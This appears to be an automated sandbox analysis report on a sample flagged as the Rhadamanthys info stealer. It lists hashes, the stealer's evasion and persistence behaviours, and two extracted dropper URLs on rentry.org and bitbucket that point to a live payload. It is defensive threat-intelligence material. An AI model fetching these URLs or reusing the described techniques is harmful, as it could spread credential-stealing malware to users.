rhadamanthys | a80bfccb304febe1b0e5ae0fcda7c9ed306b3ba10758adfc4dc0e822f30f4027

Analysis

max time kernel
410s
max time network
463s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
15-06-2024 19:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RedEngine.zip
Size

3.0MB
MD5

66643af574ad23a5311eefe6801c9b03
SHA1

156437c16d3d041b017952f6a5fe468a7af00cfd
SHA256

a80bfccb304febe1b0e5ae0fcda7c9ed306b3ba10758adfc4dc0e822f30f4027
SHA512

71e31b2d1891ebea7b393fed37ea3a2b0f9744269e44ee59838ab231ffaa6ee44d8858b2e17e15479bc39350cc406823899ba99eb93318926eea7898b9ed3c4f
SSDEEP

98304:tJEs+SlSXYEoya3FW9M1NFUh18k66vTK09no:tJEs+S8IfhWSkH66LS

Score

10^/10

rhadamanthys evasion execution persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

sebxspm5.emd1.exeyqw0ekta.jmh1.exeh1jessfo.kil1.exemopebpra.il01.exe

description	pid	process	target process
PID 2936 created 2528	2936	sebxspm5.emd1.exe	sihost.exe
PID 1412 created 2528	1412	yqw0ekta.jmh1.exe	sihost.exe
PID 3504 created 2528	3504	h1jessfo.kil1.exe	sihost.exe
PID 4436 created 2528	4436	mopebpra.il01.exe	sihost.exe

Blocklisted process makes network request 20 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsiexec.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
254	3744	powershell.exe
256	3744	powershell.exe
260	4860	powershell.exe
261	1172	powershell.exe
263	3908	powershell.exe
264	3908	powershell.exe
265	4292	powershell.exe
266	4292	powershell.exe
267	3624	powershell.exe
268	4904	powershell.exe
270	2308	powershell.exe
271	2308	powershell.exe
272	3548	powershell.exe
274	5224	msiexec.exe
275	5896	powershell.exe
276	5896	powershell.exe
277	5864	powershell.exe
278	5864	powershell.exe
279	4060	powershell.exe
280	4532	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 25 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4764
3548	powershell.exe
6888	powershell.exe
5656	powershell.exe
4496	powershell.exe
4792
4860	powershell.exe
3624	powershell.exe
4904	powershell.exe
4060	powershell.exe
7780	powershell.exe
6060	powershell.exe
8156
1172	powershell.exe
3908	powershell.exe
7420
4656
3744	powershell.exe
4292	powershell.exe
2308	powershell.exe
5896	powershell.exe
5864	powershell.exe
4532	powershell.exe
3552	powershell.exe
7536

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cdvff4nc.wrd0.exeh1jessfo.kil3.exemopebpra.il00.exemopebpra.il03.exeyqw0ekta.jmh3.exeh1jessfo.kil0.execdvff4nc.wrd3.exesebxspm5.emd0.exesebxspm5.emd3.exeyqw0ekta.jmh0.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	cdvff4nc.wrd0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	h1jessfo.kil3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	mopebpra.il00.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	mopebpra.il03.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	yqw0ekta.jmh3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	h1jessfo.kil0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	cdvff4nc.wrd3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	sebxspm5.emd0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	sebxspm5.emd3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	yqw0ekta.jmh0.exe

Executes dropped EXE 20 IoCs

Processes:

sebxspm5.emd0.exesebxspm5.emd1.exesebxspm5.emd2.exesebxspm5.emd3.exeyqw0ekta.jmh0.exeyqw0ekta.jmh1.exeyqw0ekta.jmh2.exeyqw0ekta.jmh3.exeh1jessfo.kil0.exeh1jessfo.kil1.exeh1jessfo.kil2.exeh1jessfo.kil3.exemopebpra.il00.exemopebpra.il01.exemopebpra.il02.exemopebpra.il03.execdvff4nc.wrd0.execdvff4nc.wrd1.execdvff4nc.wrd2.execdvff4nc.wrd3.exe

pid	process
2260	sebxspm5.emd0.exe
2936	sebxspm5.emd1.exe
628	sebxspm5.emd2.exe
2004	sebxspm5.emd3.exe
444	yqw0ekta.jmh0.exe
1412	yqw0ekta.jmh1.exe
680	yqw0ekta.jmh2.exe
4808	yqw0ekta.jmh3.exe
1332	h1jessfo.kil0.exe
3504	h1jessfo.kil1.exe
4740	h1jessfo.kil2.exe
2092	h1jessfo.kil3.exe
3440	mopebpra.il00.exe
4436	mopebpra.il01.exe
1644	mopebpra.il02.exe
4992	mopebpra.il03.exe
5944	cdvff4nc.wrd0.exe
508	cdvff4nc.wrd1.exe
4860	cdvff4nc.wrd2.exe
5036	cdvff4nc.wrd3.exe

Loads dropped DLL 4 IoCs

Processes:

MsiExec.exe

pid process

5420 MsiExec.exe
5420 MsiExec.exe
5420 MsiExec.exe
5420 MsiExec.exe

pid	process
5420	MsiExec.exe
5420	MsiExec.exe
5420	MsiExec.exe
5420	MsiExec.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exe

description	ioc	process
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs

Web Service

T1102

Processes:

flow	ioc
276	bitbucket.org
281	bitbucket.org
255	bitbucket.org
264	bitbucket.org
271	bitbucket.org
256	bitbucket.org
295	bitbucket.org
284	bitbucket.org
294	bitbucket.org
121	discord.com
266	bitbucket.org
278	bitbucket.org
297	bitbucket.org
301	bitbucket.org
119	discord.com
120	discord.com
261	bitbucket.org

Drops file in System32 directory 1 IoCs

Processes:

sebxspm5.emd2.exe

description ioc process

File opened for modification C:\Windows\system32\MRT.exe sebxspm5.emd2.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

sebxspm5.emd2.exe

description pid process target process

PID 628 set thread context of 5740 628 sebxspm5.emd2.exe dialer.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	sebxspm5.emd2.exe

description	pid	process	target process
PID 628 set thread context of 5740	628	sebxspm5.emd2.exe	dialer.exe

Drops file in Windows directory 11 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3C70.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{637236E9-EF59-4F9D-8269-3083C1A6C6D6}	msiexec.exe
File created	C:\Windows\Installer\e5d3a9b.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3C40.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3D1D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4982.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI56E1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e5d3a9b.msi	msiexec.exe

Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5672 sc.exe
3168
7412
4316 sc.exe
5268 sc.exe
4056 sc.exe
7728
7580
5504 sc.exe
5804 sc.exe
5836 sc.exe
6216
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4884 schtasks.exe
6956 schtasks.exe
7776

pid	process
5672	sc.exe
3168
7412
4316	sc.exe
5268	sc.exe
4056	sc.exe
7728
7580
5504	sc.exe
5804	sc.exe
5836	sc.exe
6216

pid	process
4884	schtasks.exe
6956	schtasks.exe
7776

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
5976	timeout.exe
5344	timeout.exe
7628	timeout.exe
7296
7252
5328	timeout.exe
7304
800
6428
6188
7772
6376	timeout.exe
7664	timeout.exe
7888
1616	timeout.exe
6136	timeout.exe
5720	timeout.exe
7672
7552
5752	timeout.exe
7996
5360
7376	timeout.exe
6452
5308
5160
6504
7124	timeout.exe
7348	timeout.exe
7588	timeout.exe
7064
7852
5416
6824	timeout.exe
6428
8044
5556
3724	timeout.exe
5776	timeout.exe
5420
7560
5804	timeout.exe
5164	timeout.exe
4132	timeout.exe
7668	timeout.exe
2424	timeout.exe
1032	timeout.exe
8152
652
5484	timeout.exe
2036
5756
7940
5848
6188
6516	timeout.exe
4432
6648	timeout.exe
8112	timeout.exe
7948	timeout.exe
6756	timeout.exe
4016
1696
460

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
7304	tasklist.exe
8172	tasklist.exe
4988	tasklist.exe
744	tasklist.exe
4360	tasklist.exe
512	tasklist.exe
1384	tasklist.exe
3588	tasklist.exe
5656	tasklist.exe
7652	tasklist.exe
6848	tasklist.exe
4740	tasklist.exe
4708	tasklist.exe
5848	tasklist.exe
5388	tasklist.exe
2752	tasklist.exe
4816	tasklist.exe
5768	tasklist.exe
5664	tasklist.exe
6580	tasklist.exe
4324	tasklist.exe
5792	tasklist.exe
7204	tasklist.exe
2420	tasklist.exe
6128	tasklist.exe
7596	tasklist.exe
6468	tasklist.exe
7912	tasklist.exe
7408	tasklist.exe
7832	tasklist.exe
1472	tasklist.exe
5188	tasklist.exe
6496	tasklist.exe
1744	tasklist.exe
2752	tasklist.exe
6472	tasklist.exe
4880	tasklist.exe
6408	tasklist.exe
6496	tasklist.exe
6916	tasklist.exe
6368	tasklist.exe
7144	tasklist.exe
1864
5296	tasklist.exe
5976	tasklist.exe
2200	tasklist.exe
5696	tasklist.exe
7576	tasklist.exe
5316	tasklist.exe
5268	tasklist.exe
6772	tasklist.exe
6176	tasklist.exe
512	tasklist.exe
5572	tasklist.exe
6200	tasklist.exe
5344	tasklist.exe
7696	tasklist.exe
2888	tasklist.exe
5904	tasklist.exe
908	tasklist.exe
6560	tasklist.exe
3484	tasklist.exe
6836	tasklist.exe
6452	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5512	taskkill.exe
5916	taskkill.exe
6204	taskkill.exe
7140	taskkill.exe
2576	taskkill.exe
2020	taskkill.exe
3248	taskkill.exe
7340	taskkill.exe
448	taskkill.exe
8044	taskkill.exe
6664	taskkill.exe
1684	taskkill.exe
4660	taskkill.exe
6064	taskkill.exe
5976	taskkill.exe
6244	taskkill.exe
5244	taskkill.exe
6540	taskkill.exe
5816	taskkill.exe
6100	taskkill.exe
6220	taskkill.exe
6920	taskkill.exe
7932	taskkill.exe
5240	taskkill.exe
5832	taskkill.exe
5312	taskkill.exe
4944	taskkill.exe
7976	taskkill.exe
840	taskkill.exe
4796	taskkill.exe
7992
4348	taskkill.exe
5428	taskkill.exe
6320	taskkill.exe
5620	taskkill.exe
4360	taskkill.exe
7756	taskkill.exe
3752	taskkill.exe
5736	taskkill.exe
7364	taskkill.exe
4796	taskkill.exe
4044	taskkill.exe
1852	taskkill.exe
5876	taskkill.exe
1768	taskkill.exe
5312	taskkill.exe
7548	taskkill.exe
2596	taskkill.exe
2424	taskkill.exe
2936	taskkill.exe
6528	taskkill.exe
5892	taskkill.exe
3544	taskkill.exe
6500	taskkill.exe
4172	taskkill.exe
448	taskkill.exe
6724	taskkill.exe
7536	taskkill.exe
2340	taskkill.exe
6868	taskkill.exe
7992	taskkill.exe
8036	taskkill.exe
8148	taskkill.exe
5948	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133629535344321738"	chrome.exe

Modifies registry class 2 IoCs

Processes:

chrome.exechrome.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4204450073-1267028356-951339405-1000\{08F2DE00-6ABE-48C1-828D-C6A22478C0AF}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exepowershell.exepowershell.exepowershell.exesebxspm5.emd1.exepowershell.exedialer.exepowershell.exepowershell.exeyqw0ekta.jmh1.exedialer.exepowershell.exeh1jessfo.kil1.exedialer.exepowershell.exepowershell.exemopebpra.il01.exedialer.exemsiexec.exepowershell.exepowershell.exesebxspm5.emd2.exepowershell.exe

pid	process
1904	chrome.exe
1904	chrome.exe
3196	chrome.exe
3196	chrome.exe
3744	powershell.exe
3744	powershell.exe
4860	powershell.exe
4860	powershell.exe
1172	powershell.exe
1172	powershell.exe
1172	powershell.exe
2936	sebxspm5.emd1.exe
2936	sebxspm5.emd1.exe
3908	powershell.exe
3908	powershell.exe
3908	powershell.exe
1420	dialer.exe
1420	dialer.exe
1420	dialer.exe
1420	dialer.exe
4292	powershell.exe
4292	powershell.exe
4292	powershell.exe
3624	powershell.exe
3624	powershell.exe
3624	powershell.exe
1412	yqw0ekta.jmh1.exe
1412	yqw0ekta.jmh1.exe
1224	dialer.exe
1224	dialer.exe
1224	dialer.exe
1224	dialer.exe
4904	powershell.exe
4904	powershell.exe
4904	powershell.exe
3504	h1jessfo.kil1.exe
3504	h1jessfo.kil1.exe
3044	dialer.exe
3044	dialer.exe
3044	dialer.exe
3044	dialer.exe
2308	powershell.exe
2308	powershell.exe
2308	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
4436	mopebpra.il01.exe
4436	mopebpra.il01.exe
5432	dialer.exe
5432	dialer.exe
5432	dialer.exe
5432	dialer.exe
5224	msiexec.exe
5224	msiexec.exe
5896	powershell.exe
5896	powershell.exe
5896	powershell.exe
5864	powershell.exe
5864	powershell.exe
5864	powershell.exe
628	sebxspm5.emd2.exe
6060	powershell.exe
6060	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

Processes:

chrome.exe

pid process

1904 chrome.exe
1904 chrome.exe
1904 chrome.exe
1904 chrome.exe
1904 chrome.exe
1904 chrome.exe
1904 chrome.exe
1904 chrome.exe
1904 chrome.exe
1904 chrome.exe
1904 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exeAUDIODG.EXE

description	pid	process
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: 33	1572	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1572	AUDIODG.EXE
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe
Token: SeShutdownPrivilege	1904	chrome.exe
Token: SeCreatePagefilePrivilege	1904	chrome.exe

Suspicious use of FindShellTrayWindow 35 IoCs

Processes:

chrome.exe

pid	process
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe
1904	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1904 wrote to memory of 808	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 808	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4940	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4028	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 4028	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe
PID 1904 wrote to memory of 5080	1904	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2528

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1420

C:\Windows\SysWOW64\dialer.exe
